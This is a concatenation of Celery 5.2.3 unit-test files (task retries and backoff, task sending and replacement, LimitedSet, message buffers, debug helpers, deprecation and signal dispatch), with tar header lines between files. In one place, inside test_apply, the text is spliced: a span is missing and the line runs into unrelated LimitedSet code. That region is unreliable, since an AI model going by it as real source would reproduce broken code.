self.retry_task_mockapply.applied finally: self.retry_task_mockapply.applied = 0 finally: self.retry_task_mockapply.pop_request() def test_retry_with_kwargs(self): self.retry_task_customexc.max_retries = 3 self.retry_task_customexc.iterations = 0 self.retry_task_customexc.apply([0xFF, 0xFFFF], {'kwarg': 0xF}) assert self.retry_task_customexc.iterations == 4 def test_retry_with_custom_exception(self): self.retry_task_customexc.max_retries = 2 self.retry_task_customexc.iterations = 0 result = self.retry_task_customexc.apply( [0xFF, 0xFFFF], {'kwarg': 0xF}, ) with pytest.raises(MyCustomException): result.get() assert self.retry_task_customexc.iterations == 3 def test_max_retries_exceeded(self): self.retry_task.max_retries = 2 self.retry_task.iterations = 0 result = self.retry_task.apply([0xFF, 0xFFFF], {'care': False}) with pytest.raises(self.retry_task.MaxRetriesExceededError): result.get() assert self.retry_task.iterations == 3 self.retry_task.max_retries = 1 self.retry_task.iterations = 0 result = self.retry_task.apply([0xFF, 0xFFFF], {'care': False}) with pytest.raises(self.retry_task.MaxRetriesExceededError): result.get() assert self.retry_task.iterations == 2 def test_max_retries_exceeded_task_args(self): self.retry_task.max_retries = 2 self.retry_task.iterations = 0 args = (0xFF, 0xFFFF) kwargs = {'care': False} result = self.retry_task.apply(args, kwargs) with pytest.raises(self.retry_task.MaxRetriesExceededError) as e: result.get() assert e.value.task_args == args assert e.value.task_kwargs == kwargs def test_autoretry_no_kwargs(self): self.autoretry_task_no_kwargs.max_retries = 3 self.autoretry_task_no_kwargs.iterations = 0 self.autoretry_task_no_kwargs.apply((1, 0)) assert self.autoretry_task_no_kwargs.iterations == 4 def test_autoretry(self): self.autoretry_task.max_retries = 3 self.autoretry_task.iterations = 0 self.autoretry_task.apply((1, 0)) assert self.autoretry_task.iterations == 6 @patch('random.randrange', side_effect=lambda i: i - 1) def test_autoretry_backoff(self, randrange): task = self.autoretry_backoff_task task.max_retries = 3 task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply(("http://httpbin.org/error",)) assert task.iterations == 4 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [1, 2, 4, 8] @patch('random.randrange', side_effect=lambda i: i - 2) def test_autoretry_backoff_jitter(self, randrange): task = self.autoretry_backoff_jitter_task task.max_retries = 3 task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply(("http://httpbin.org/error",)) assert task.iterations == 4 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [0, 1, 3, 7] def test_autoretry_for_from_base(self): self.autoretry_for_from_base_task.iterations = 0 self.autoretry_for_from_base_task.apply((1, "a")) assert self.autoretry_for_from_base_task.iterations == 6 def test_override_autoretry_for_from_base(self): self.override_autoretry_for.iterations = 0 self.override_autoretry_for.apply((1, 0)) assert self.override_autoretry_for.iterations == 6 def test_retry_kwargs_from_base(self): self.retry_kwargs_from_base_task.iterations = 0 self.retry_kwargs_from_base_task.apply((1, "a")) assert self.retry_kwargs_from_base_task.iterations == 6 def test_override_retry_kwargs_from_base(self): self.override_retry_kwargs.iterations = 0 self.override_retry_kwargs.apply((1, "a")) assert 
self.override_retry_kwargs.iterations == 3 def test_retry_backoff_from_base(self): task = self.retry_backoff_from_base_task task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply((1, "a")) assert task.iterations == 6 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [1, 2, 4, 8, 16, 32] @patch('celery.app.autoretry.get_exponential_backoff_interval') def test_override_retry_backoff_from_base(self, backoff): self.override_retry_backoff.iterations = 0 self.override_retry_backoff.apply((1, "a")) assert self.override_retry_backoff.iterations == 6 assert backoff.call_count == 0 def test_retry_backoff_max_from_base(self): task = self.retry_backoff_max_from_base_task task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply((1, "a")) assert task.iterations == 6 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [1, 2, 4, 8, 16, 32] def test_override_retry_backoff_max_from_base(self): task = self.override_backoff_max task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply((1, "a")) assert task.iterations == 6 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [1, 2, 4, 8, 16, 16] def test_retry_backoff_jitter_from_base(self): task = self.retry_backoff_jitter_from_base task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply((1, "a")) assert task.iterations == 6 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [1, 2, 4, 8, 16, 32] @patch('random.randrange', side_effect=lambda i: i - 2) def test_override_backoff_jitter_from_base(self, randrange): task = self.override_backoff_jitter task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply((1, "a")) assert task.iterations == 6 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [0, 1, 3, 7, 15, 31] def test_retry_wrong_eta_when_not_enable_utc(self): """Issue #3753""" self.app.conf.enable_utc = False self.app.conf.timezone = 'US/Eastern' self.autoretry_task.iterations = 0 self.autoretry_task.default_retry_delay = 2 self.autoretry_task.apply((1, 0)) assert self.autoretry_task.iterations == 6 def test_autoretry_class_based_task(self): class ClassBasedAutoRetryTask(Task): name = 'ClassBasedAutoRetryTask' autoretry_for = (ZeroDivisionError,) retry_kwargs = {'max_retries': 5} retry_backoff = True retry_backoff_max = 700 retry_jitter = False iterations = 0 _app = self.app def run(self, x, y): self.iterations += 1 return x / y task = ClassBasedAutoRetryTask() self.app.tasks.register(task) task.iterations = 0 task.apply([1, 0]) assert task.iterations == 6 class test_canvas_utils(TasksCase): def test_si(self): assert self.retry_task.si() assert self.retry_task.si().immutable def test_chunks(self): assert self.retry_task.chunks(range(100), 10) def test_map(self): assert self.retry_task.map(range(100)) def test_starmap(self): assert self.retry_task.starmap(range(100)) def test_on_success(self): self.retry_task.on_success(1, 1, (), {}) class test_tasks(TasksCase): def now(self): return self.app.now() def test_typing(self): @self.app.task() def add(x, y, kw=1): pass with pytest.raises(TypeError): add.delay(1) with 
pytest.raises(TypeError): add.delay(1, kw=2) with pytest.raises(TypeError): add.delay(1, 2, foobar=3) add.delay(2, 2) def test_shadow_name(self): def shadow_name(task, args, kwargs, options): return 'fooxyz' @self.app.task(shadow_name=shadow_name) def shadowed(): pass old_send_task = self.app.send_task self.app.send_task = Mock() shadowed.delay() self.app.send_task.assert_called_once_with(ANY, ANY, ANY, compression=ANY, delivery_mode=ANY, exchange=ANY, expires=ANY, immediate=ANY, link=ANY, link_error=ANY, mandatory=ANY, priority=ANY, producer=ANY, queue=ANY, result_cls=ANY, routing_key=ANY, serializer=ANY, soft_time_limit=ANY, task_id=ANY, task_type=ANY, time_limit=ANY, shadow='fooxyz', ignore_result=False) self.app.send_task = old_send_task def test_inherit_parent_priority_child_task(self): self.app.conf.task_inherit_parent_priority = True self.app.producer_or_acquire = Mock() self.app.producer_or_acquire.attach_mock( ContextMock(serializer='json'), 'return_value') self.app.amqp.send_task_message = Mock(name="send_task_message") self.task_which_calls_other_task.apply(args=[]) self.app.amqp.send_task_message.assert_called_with( ANY, 't.unit.tasks.test_tasks.task_called_by_other_task', ANY, priority=5, queue=ANY, serializer=ANY) def test_typing__disabled(self): @self.app.task(typing=False) def add(x, y, kw=1): pass add.delay(1) add.delay(1, kw=2) add.delay(1, 2, foobar=3) def test_typing__disabled_by_app(self): with self.Celery(set_as_current=False, strict_typing=False) as app: @app.task() def add(x, y, kw=1): pass assert not add.typing add.delay(1) add.delay(1, kw=2) add.delay(1, 2, foobar=3) @pytest.mark.usefixtures('depends_on_current_app') def test_unpickle_task(self): import pickle @self.app.task(shared=True) def xxx(): pass assert pickle.loads(pickle.dumps(xxx)) is xxx.app.tasks[xxx.name] @patch('celery.app.task.current_app') @pytest.mark.usefixtures('depends_on_current_app') def test_bind__no_app(self, current_app): class XTask(Task): _app = None XTask._app = None XTask.__bound__ = False XTask.bind = Mock(name='bind') assert XTask.app is current_app XTask.bind.assert_called_with(current_app) def test_reprtask__no_fmt(self): assert _reprtask(self.mytask) def test_AsyncResult(self): task_id = uuid() result = self.retry_task.AsyncResult(task_id) assert result.backend == self.retry_task.backend assert result.id == task_id def assert_next_task_data_equal(self, consumer, presult, task_name, test_eta=False, test_expires=False, properties=None, headers=None, **kwargs): next_task = consumer.queues[0].get(accept=['pickle', 'json']) task_properties = next_task.properties task_headers = next_task.headers task_body = next_task.decode() task_args, task_kwargs, embed = task_body assert task_headers['id'] == presult.id assert task_headers['task'] == task_name if test_eta: assert isinstance(task_headers.get('eta'), str) to_datetime = parse_iso8601(task_headers.get('eta')) assert isinstance(to_datetime, datetime) if test_expires: assert isinstance(task_headers.get('expires'), str) to_datetime = parse_iso8601(task_headers.get('expires')) assert isinstance(to_datetime, datetime) properties = properties or {} for arg_name, arg_value in properties.items(): assert task_properties.get(arg_name) == arg_value headers = headers or {} for arg_name, arg_value in headers.items(): assert task_headers.get(arg_name) == arg_value for arg_name, arg_value in kwargs.items(): assert task_kwargs.get(arg_name) == arg_value def test_incomplete_task_cls(self): class IncompleteTask(Task): app = self.app name = 
'c.unittest.t.itask' with pytest.raises(NotImplementedError): IncompleteTask().run() def test_task_kwargs_must_be_dictionary(self): with pytest.raises(TypeError): self.increment_counter.apply_async([], 'str') def test_task_args_must_be_list(self): with pytest.raises(TypeError): self.increment_counter.apply_async('s', {}) def test_regular_task(self): assert isinstance(self.mytask, Task) assert self.mytask.run() assert callable(self.mytask) assert self.mytask(), 'Task class runs run() when called' with self.app.connection_or_acquire() as conn: consumer = self.app.amqp.TaskConsumer(conn) with pytest.raises(NotImplementedError): consumer.receive('foo', 'foo') consumer.purge() assert consumer.queues[0].get() is None self.app.amqp.TaskConsumer(conn, queues=[Queue('foo')]) # Without arguments. presult = self.mytask.delay() self.assert_next_task_data_equal( consumer, presult, self.mytask.name) # With arguments. presult2 = self.mytask.apply_async( kwargs={'name': 'George Costanza'}, ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Costanza', ) # send_task sresult = self.app.send_task(self.mytask.name, kwargs={'name': 'Elaine M. Benes'}) self.assert_next_task_data_equal( consumer, sresult, self.mytask.name, name='Elaine M. Benes', ) # With ETA, absolute expires. presult2 = self.mytask.apply_async( kwargs={'name': 'George Costanza'}, eta=self.now() + timedelta(days=1), expires=self.now() + timedelta(days=2), ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Costanza', test_eta=True, test_expires=True, ) # With ETA, absolute expires without timezone. presult2 = self.mytask.apply_async( kwargs={'name': 'George Constanza'}, eta=self.now() + timedelta(days=1), expires=(self.now() + timedelta(hours=2)).replace(tzinfo=None), ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Constanza', test_eta=True, test_expires=True, ) # With ETA, absolute expires in the past. presult2 = self.mytask.apply_async( kwargs={'name': 'George Costanza'}, eta=self.now() + timedelta(days=1), expires=self.now() - timedelta(days=2), ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Costanza', test_eta=True, test_expires=True, ) # With ETA, relative expires. presult2 = self.mytask.apply_async( kwargs={'name': 'George Costanza'}, eta=self.now() + timedelta(days=1), expires=2 * 24 * 60 * 60, ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Costanza', test_eta=True, test_expires=True, ) # With countdown. presult2 = self.mytask.apply_async( kwargs={'name': 'George Costanza'}, countdown=10, expires=12, ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Costanza', test_eta=True, test_expires=True, ) # Default argsrepr/kwargsrepr behavior presult2 = self.mytask.apply_async( args=('spam',), kwargs={'name': 'Jerry Seinfeld'} ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, headers={'argsrepr': "('spam',)", 'kwargsrepr': "{'name': 'Jerry Seinfeld'}"}, ) # With argsrepr/kwargsrepr presult2 = self.mytask.apply_async( args=('secret',), argsrepr="'***'", kwargs={'password': 'foo'}, kwargsrepr="{'password': '***'}", ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, headers={'argsrepr': "'***'", 'kwargsrepr': "{'password': '***'}"}, ) # Discarding all tasks. 
consumer.purge() self.mytask.apply_async() assert consumer.purge() == 1 assert consumer.queues[0].get() is None assert not presult.successful() self.mytask.backend.mark_as_done(presult.id, result=None) assert presult.successful() def test_send_event(self): mytask = self.mytask._get_current_object() mytask.app.events = Mock(name='events') mytask.app.events.attach_mock(ContextMock(), 'default_dispatcher') mytask.request.id = 'fb' mytask.send_event('task-foo', id=3122) mytask.app.events.default_dispatcher().send.assert_called_with( 'task-foo', uuid='fb', id=3122, retry=True, retry_policy=self.app.conf.task_publish_retry_policy) def test_replace(self): sig1 = MagicMock(name='sig1') sig1.options = {} self.mytask.request.id = sentinel.request_id with pytest.raises(Ignore): self.mytask.replace(sig1) sig1.freeze.assert_called_once_with(self.mytask.request.id) sig1.set.assert_called_once_with(replaced_task_nesting=1, chord=ANY, group_id=ANY, group_index=ANY, root_id=ANY) def test_replace_with_chord(self): sig1 = Mock(name='sig1') sig1.options = {'chord': None} with pytest.raises(ImproperlyConfigured): self.mytask.replace(sig1) def test_replace_callback(self): c = group([self.mytask.s()], app=self.app) c.freeze = Mock(name='freeze') c.delay = Mock(name='delay') self.mytask.request.id = 'id' self.mytask.request.group = 'group' self.mytask.request.root_id = 'root_id' self.mytask.request.callbacks = callbacks = 'callbacks' self.mytask.request.errbacks = errbacks = 'errbacks' # Replacement groups get uplifted to chords so that we can accumulate # the results and link call/errbacks - patch the appropriate `chord` # methods so we can validate this behaviour with patch( "celery.canvas.chord.link" ) as mock_chord_link, patch( "celery.canvas.chord.link_error" ) as mock_chord_link_error: with pytest.raises(Ignore): self.mytask.replace(c) # Confirm that the call/errbacks on the original signature are linked # to the replacement signature as expected mock_chord_link.assert_called_once_with(callbacks) mock_chord_link_error.assert_called_once_with(errbacks) def test_replace_group(self): c = group([self.mytask.s()], app=self.app) c.freeze = Mock(name='freeze') c.delay = Mock(name='delay') self.mytask.request.id = 'id' self.mytask.request.group = 'group' self.mytask.request.root_id = 'root_id', with pytest.raises(Ignore): self.mytask.replace(c) def test_replace_run(self): with pytest.raises(Ignore): self.task_replaced_by_other_task.run() def test_replace_run_with_autoretry(self): with pytest.raises(Ignore): self.task_replaced_by_other_task_with_autoretry.run() def test_replace_delay(self): res = self.task_replaced_by_other_task.delay() assert isinstance(res, AsyncResult) def test_replace_apply(self): res = self.task_replaced_by_other_task.apply() assert isinstance(res, EagerResult) assert res.get() == "replaced" def test_add_trail__no_trail(self): mytask = self.increment_counter._get_current_object() mytask.trail = False mytask.add_trail('foo') def test_repr_v2_compat(self): self.mytask.__v2_compat__ = True assert 'v2 compatible' in repr(self.mytask) def test_context_get(self): self.mytask.push_request() try: request = self.mytask.request request.foo = 32 assert request.get('foo') == 32 assert request.get('bar', 36) == 36 request.clear() finally: self.mytask.pop_request() def test_annotate(self): with patch('celery.app.task.resolve_all_annotations') as anno: anno.return_value = [{'FOO': 'BAR'}] @self.app.task(shared=False) def task(): pass task.annotate() assert task.FOO == 'BAR' def test_after_return(self): 
self.mytask.push_request() try: self.mytask.request.chord = self.mytask.s() self.mytask.after_return('SUCCESS', 1.0, 'foobar', (), {}, None) self.mytask.request.clear() finally: self.mytask.pop_request() def test_update_state(self): @self.app.task(shared=False) def yyy(): pass yyy.push_request() try: tid = uuid() # update_state should accept arbitrary kwargs, which are passed to # the backend store_result method yyy.update_state(tid, 'FROBULATING', {'fooz': 'baaz'}, arbitrary_kwarg=None) assert yyy.AsyncResult(tid).status == 'FROBULATING' assert yyy.AsyncResult(tid).result == {'fooz': 'baaz'} yyy.request.id = tid yyy.update_state(state='FROBUZATING', meta={'fooz': 'baaz'}) assert yyy.AsyncResult(tid).status == 'FROBUZATING' assert yyy.AsyncResult(tid).result == {'fooz': 'baaz'} finally: yyy.pop_request() def test_update_state_passes_request_to_backend(self): backend = Mock() @self.app.task(shared=False, backend=backend) def ttt(): pass ttt.push_request() tid = uuid() ttt.update_state(tid, 'SHRIMMING', {'foo': 'bar'}) backend.store_result.assert_called_once_with( tid, {'foo': 'bar'}, 'SHRIMMING', request=ttt.request ) def test_repr(self): @self.app.task(shared=False) def task_test_repr(): pass assert 'task_test_repr' in repr(task_test_repr) def test_has___name__(self): @self.app.task(shared=False) def yyy2(): pass assert yyy2.__name__ def test_default_priority(self): @self.app.task(shared=False) def yyy3(): pass @self.app.task(shared=False, priority=66) def yyy4(): pass @self.app.task(shared=False, bind=True, base=TaskWithPriority) def yyy5(self): pass self.app.conf.task_default_priority = 42 old_send_task = self.app.send_task self.app.send_task = Mock() yyy3.delay() self.app.send_task.assert_called_once_with(ANY, ANY, ANY, compression=ANY, delivery_mode=ANY, exchange=ANY, expires=ANY, immediate=ANY, link=ANY, link_error=ANY, mandatory=ANY, priority=42, producer=ANY, queue=ANY, result_cls=ANY, routing_key=ANY, serializer=ANY, soft_time_limit=ANY, task_id=ANY, task_type=ANY, time_limit=ANY, shadow=None, ignore_result=False) self.app.send_task = Mock() yyy4.delay() self.app.send_task.assert_called_once_with(ANY, ANY, ANY, compression=ANY, delivery_mode=ANY, exchange=ANY, expires=ANY, immediate=ANY, link=ANY, link_error=ANY, mandatory=ANY, priority=66, producer=ANY, queue=ANY, result_cls=ANY, routing_key=ANY, serializer=ANY, soft_time_limit=ANY, task_id=ANY, task_type=ANY, time_limit=ANY, shadow=None, ignore_result=False) self.app.send_task = Mock() yyy5.delay() self.app.send_task.assert_called_once_with(ANY, ANY, ANY, compression=ANY, delivery_mode=ANY, exchange=ANY, expires=ANY, immediate=ANY, link=ANY, link_error=ANY, mandatory=ANY, priority=10, producer=ANY, queue=ANY, result_cls=ANY, routing_key=ANY, serializer=ANY, soft_time_limit=ANY, task_id=ANY, task_type=ANY, time_limit=ANY, shadow=None, ignore_result=False) self.app.send_task = old_send_task class test_apply_task(TasksCase): def test_apply_throw(self): with pytest.raises(KeyError): self.raising.apply(throw=True) def test_apply_with_task_eager_propagates(self): self.app.conf.task_eager_propagates = True with pytest.raises(KeyError): self.raising.apply() def test_apply_request_context_is_ok(self): self.app.conf.task_eager_propagates = True self.task_check_request_context.apply() def test_apply(self): self.increment_counter.count = 0 e = self.increment_counter.apply() assert isinstance(e, EagerResult) assert e.get() == 1 e = self.increment_counter.apply(args=[1]) assert e.get() == 2 e = 
self.increment_counter.apply(kwargs={'increment_by': 4}) assert e.get() == 6 assert e.successful() assert e.ready() assert repr(e).startswith(' minsize s = LimitedSet(maxlen=10, minlen=10, expires=1) [s.add(i) for i in range(20)] s.minlen = 3 s.purge(now=monotonic() + 3) assert s.minlen == len(s) assert len(s._heap) <= s.maxlen * ( 100. + s.max_heap_percent_overload) / 100 def test_pickleable(self): s = LimitedSet(maxlen=2) s.add('foo') s.add('bar') assert pickle.loads(pickle.dumps(s)) == s def test_iter(self): s = LimitedSet(maxlen=3) items = ['foo', 'bar', 'baz', 'xaz'] for item in items: s.add(item) l = list(iter(s)) for item in items[1:]: assert item in l assert 'foo' not in l assert l == items[1:], 'order by insertion time' def test_repr(self): s = LimitedSet(maxlen=2) items = 'foo', 'bar' for item in items: s.add(item) assert 'LimitedSet(' in repr(s) def test_discard(self): s = LimitedSet(maxlen=2) s.add('foo') s.discard('foo') assert 'foo' not in s assert len(s._data) == 0 s.discard('foo') def test_clear(self): s = LimitedSet(maxlen=2) s.add('foo') s.add('bar') assert len(s) == 2 s.clear() assert not s def test_update(self): s1 = LimitedSet(maxlen=2) s1.add('foo') s1.add('bar') s2 = LimitedSet(maxlen=2) s2.update(s1) assert sorted(list(s2)) == ['bar', 'foo'] s2.update(['bla']) assert sorted(list(s2)) == ['bar', 'bla'] s2.update(['do', 're']) assert sorted(list(s2)) == ['do', 're'] s1 = LimitedSet(maxlen=10, expires=None) s2 = LimitedSet(maxlen=10, expires=None) s3 = LimitedSet(maxlen=10, expires=None) s4 = LimitedSet(maxlen=10, expires=None) s5 = LimitedSet(maxlen=10, expires=None) for i in range(12): s1.add(i) s2.add(i * i) s3.update(s1) s3.update(s2) s4.update(s1.as_dict()) s4.update(s2.as_dict()) s5.update(s1._data) # revoke is using this s5.update(s2._data) assert s3 == s4 assert s3 == s5 s2.update(s4) s4.update(s2) assert s2 == s4 def test_iterable_and_ordering(self): s = LimitedSet(maxlen=35, expires=None) clock = count(1) for i in reversed(range(15)): s.add(i, now=next(clock)) j = 40 for i in s: assert i < j # each item is smaller and smaller j = i assert i == 0 # last item is zero def test_pop_and_ordering_again(self): s = LimitedSet(maxlen=5) for i in range(10): s.add(i) j = -1 for _ in range(5): i = s.pop() assert j < i i = s.pop() assert i is None def test_as_dict(self): s = LimitedSet(maxlen=2) s.add('foo') assert isinstance(s.as_dict(), Mapping) def test_add_removes_duplicate_from_small_heap(self): s = LimitedSet(maxlen=2) s.add('foo') s.add('foo') s.add('foo') assert len(s) == 1 assert len(s._data) == 1 assert len(s._heap) == 1 def test_add_removes_duplicate_from_big_heap(self): s = LimitedSet(maxlen=1000) [s.add(i) for i in range(2000)] assert len(s) == 1000 [s.add('foo') for i in range(1000)] # heap is refreshed when 15% larger than _data assert len(s._heap) < 1150 [s.add('foo') for i in range(1000)] assert len(s._heap) < 1150 class test_AttributeDict: def test_getattr__setattr(self): x = AttributeDict({'foo': 'bar'}) assert x['foo'] == 'bar' with pytest.raises(AttributeError): x.bar x.bar = 'foo' assert x['bar'] == 'foo' class test_Messagebuffer: def assert_size_and_first(self, buf, size, expected_first_item): assert len(buf) == size assert buf.take() == expected_first_item def test_append_limited(self): b = Messagebuffer(10) for i in range(20): b.put(i) self.assert_size_and_first(b, 10, 10) def test_append_unlimited(self): b = Messagebuffer(None) for i in range(20): b.put(i) self.assert_size_and_first(b, 20, 0) def test_extend_limited(self): b = Messagebuffer(10) 
b.extend(list(range(20))) self.assert_size_and_first(b, 10, 10) def test_extend_unlimited(self): b = Messagebuffer(None) b.extend(list(range(20))) self.assert_size_and_first(b, 20, 0) def test_extend_eviction_time_limited(self): b = Messagebuffer(3000) b.extend(range(10000)) assert len(b) > 3000 b.evict() assert len(b) == 3000 def test_pop_empty_with_default(self): b = Messagebuffer(10) sentinel = object() assert b.take(sentinel) is sentinel def test_pop_empty_no_default(self): b = Messagebuffer(10) with pytest.raises(b.Empty): b.take() def test_repr(self): assert repr(Messagebuffer(10, [1, 2, 3])) def test_iter(self): b = Messagebuffer(10, list(range(10))) assert len(b) == 10 for i, item in enumerate(b): assert item == i assert len(b) == 0 def test_contains(self): b = Messagebuffer(10, list(range(10))) assert 5 in b def test_reversed(self): assert (list(reversed(Messagebuffer(10, list(range(10))))) == list(reversed(range(10)))) def test_getitem(self): b = Messagebuffer(10, list(range(10))) for i in range(10): assert b[i] == i class test_BufferMap: def test_append_limited(self): b = BufferMap(10) for i in range(20): b.put(i, i) self.assert_size_and_first(b, 10, 10) def assert_size_and_first(self, buf, size, expected_first_item): assert buf.total == size assert buf._LRUpop() == expected_first_item def test_append_unlimited(self): b = BufferMap(None) for i in range(20): b.put(i, i) self.assert_size_and_first(b, 20, 0) def test_extend_limited(self): b = BufferMap(10) b.extend(1, list(range(20))) self.assert_size_and_first(b, 10, 10) def test_extend_unlimited(self): b = BufferMap(None) b.extend(1, list(range(20))) self.assert_size_and_first(b, 20, 0) def test_pop_empty_with_default(self): b = BufferMap(10) sentinel = object() assert b.take(1, sentinel) is sentinel def test_pop_empty_no_default(self): b = BufferMap(10) with pytest.raises(b.Empty): b.take(1) def test_repr(self): assert repr(Messagebuffer(10, [1, 2, 3])) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_debug.py0000664000175000017500000000446500000000000017767 0ustar00asifasif00000000000000from unittest.mock import Mock import pytest from celery.utils import debug def test_on_blocking(patching): getframeinfo = patching('inspect.getframeinfo') frame = Mock(name='frame') with pytest.raises(RuntimeError): debug._on_blocking(1, frame) getframeinfo.assert_called_with(frame) def test_blockdetection(patching): signals = patching('celery.utils.debug.signals') with debug.blockdetection(10): signals.arm_alarm.assert_called_with(10) signals.__setitem__.assert_called_with('ALRM', debug._on_blocking) signals.__setitem__.assert_called_with('ALRM', signals['ALRM']) signals.reset_alarm.assert_called_with() def test_sample_mem(patching): mem_rss = patching('celery.utils.debug.mem_rss') prev, debug._mem_sample = debug._mem_sample, [] try: debug.sample_mem() assert debug._mem_sample[0] is mem_rss() finally: debug._mem_sample = prev def test_sample(): x = list(range(100)) assert list(debug.sample(x, 10)) == [ 0, 10, 20, 30, 40, 50, 60, 70, 80, 90, ] x = list(range(91)) assert list(debug.sample(x, 10)) == [ 0, 9, 18, 27, 36, 45, 54, 63, 72, 81, ] @pytest.mark.parametrize('f,precision,expected', [ (10, 5, '10'), (10.45645234234, 5, '10.456'), ]) def test_hfloat(f, precision, expected): assert str(debug.hfloat(f, precision)) == expected @pytest.mark.parametrize('byt,expected', [ (2 ** 20, '1MB'), (4 * 2 ** 20, '4MB'), (2 ** 16, '64KB'), (2 ** 16, '64KB'), (2 ** 8, 
'256b'), ]) def test_humanbytes(byt, expected): assert debug.humanbytes(byt) == expected def test_mem_rss(patching): humanbytes = patching('celery.utils.debug.humanbytes') ps = patching('celery.utils.debug.ps') ret = debug.mem_rss() ps.assert_called_with() ps().memory_info.assert_called_with() humanbytes.assert_called_with(ps().memory_info().rss) assert ret is humanbytes() ps.return_value = None assert debug.mem_rss() is None def test_ps(patching): Process = patching('celery.utils.debug.Process') getpid = patching('os.getpid') prev, debug._process = debug._process, None try: debug.ps() Process.assert_called_with(getpid()) assert debug._process is Process() finally: debug._process = prev ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_deprecated.py0000664000175000017500000000331100000000000020766 0ustar00asifasif00000000000000from unittest.mock import patch import pytest from celery.utils import deprecated class test_deprecated_property: @patch('celery.utils.deprecated.warn') def test_deprecated(self, warn): class X: _foo = None @deprecated.Property(deprecation='1.2') def foo(self): return self._foo @foo.setter def foo(self, value): self._foo = value @foo.deleter def foo(self): self._foo = None assert X.foo assert X.foo.__set__(None, 1) assert X.foo.__delete__(None) x = X() x.foo = 10 warn.assert_called_with( stacklevel=3, deprecation='1.2', alternative=None, description='foo', removal=None, ) warn.reset_mock() assert x.foo == 10 warn.assert_called_with( stacklevel=3, deprecation='1.2', alternative=None, description='foo', removal=None, ) warn.reset_mock() del(x.foo) warn.assert_called_with( stacklevel=3, deprecation='1.2', alternative=None, description='foo', removal=None, ) assert x._foo is None def test_deprecated_no_setter_or_deleter(self): class X: @deprecated.Property(deprecation='1.2') def foo(self): pass assert X.foo x = X() with pytest.raises(AttributeError): x.foo = 10 with pytest.raises(AttributeError): del(x.foo) class test_warn: @patch('warnings.warn') def test_warn_deprecated(self, warn): deprecated.warn('Foo') warn.assert_called() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_dispatcher.py0000664000175000017500000001216100000000000021017 0ustar00asifasif00000000000000import gc import sys import time from celery.utils.dispatch import Signal if sys.platform.startswith('java'): def garbage_collect(): # Some JVM GCs will execute finalizers in a different thread, meaning # we need to wait for that to complete before we go on looking for the # effects of that. gc.collect() time.sleep(0.1) elif hasattr(sys, 'pypy_version_info'): def garbage_collect(): # Collecting weakreferences can take two collections on PyPy. 
gc.collect() gc.collect() else: def garbage_collect(): gc.collect() def receiver_1_arg(val, **kwargs): return val class Callable: def __call__(self, val, **kwargs): return val def a(self, val, **kwargs): return val a_signal = Signal(providing_args=['val'], use_caching=False) class test_Signal: """Test suite for dispatcher (barely started)""" def _testIsClean(self, signal): """Assert that everything has been cleaned up automatically""" assert not signal.has_listeners() assert signal.receivers == [] def test_exact(self): a_signal.connect(receiver_1_arg, sender=self) try: expected = [(receiver_1_arg, 'test')] result = a_signal.send(sender=self, val='test') assert result == expected finally: a_signal.disconnect(receiver_1_arg, sender=self) self._testIsClean(a_signal) def test_ignored_sender(self): a_signal.connect(receiver_1_arg) try: expected = [(receiver_1_arg, 'test')] result = a_signal.send(sender=self, val='test') assert result == expected finally: a_signal.disconnect(receiver_1_arg) self._testIsClean(a_signal) def test_garbage_collected(self): a = Callable() a_signal.connect(a.a, sender=self) expected = [] del a garbage_collect() result = a_signal.send(sender=self, val='test') assert result == expected self._testIsClean(a_signal) def test_multiple_registration(self): a = Callable() result = None try: a_signal.connect(a) a_signal.connect(a) a_signal.connect(a) a_signal.connect(a) a_signal.connect(a) a_signal.connect(a) result = a_signal.send(sender=self, val='test') assert len(result) == 1 assert len(a_signal.receivers) == 1 finally: del a del result garbage_collect() self._testIsClean(a_signal) def test_uid_registration(self): def uid_based_receiver_1(**kwargs): pass def uid_based_receiver_2(**kwargs): pass a_signal.connect(uid_based_receiver_1, dispatch_uid='uid') try: a_signal.connect(uid_based_receiver_2, dispatch_uid='uid') assert len(a_signal.receivers) == 1 finally: a_signal.disconnect(dispatch_uid='uid') self._testIsClean(a_signal) def test_robust(self): def fails(val, **kwargs): raise ValueError('this') a_signal.connect(fails) try: a_signal.send(sender=self, val='test') finally: a_signal.disconnect(fails) self._testIsClean(a_signal) def test_disconnection(self): receiver_1 = Callable() receiver_2 = Callable() receiver_3 = Callable() try: try: a_signal.connect(receiver_1) a_signal.connect(receiver_2) a_signal.connect(receiver_3) finally: a_signal.disconnect(receiver_1) del receiver_2 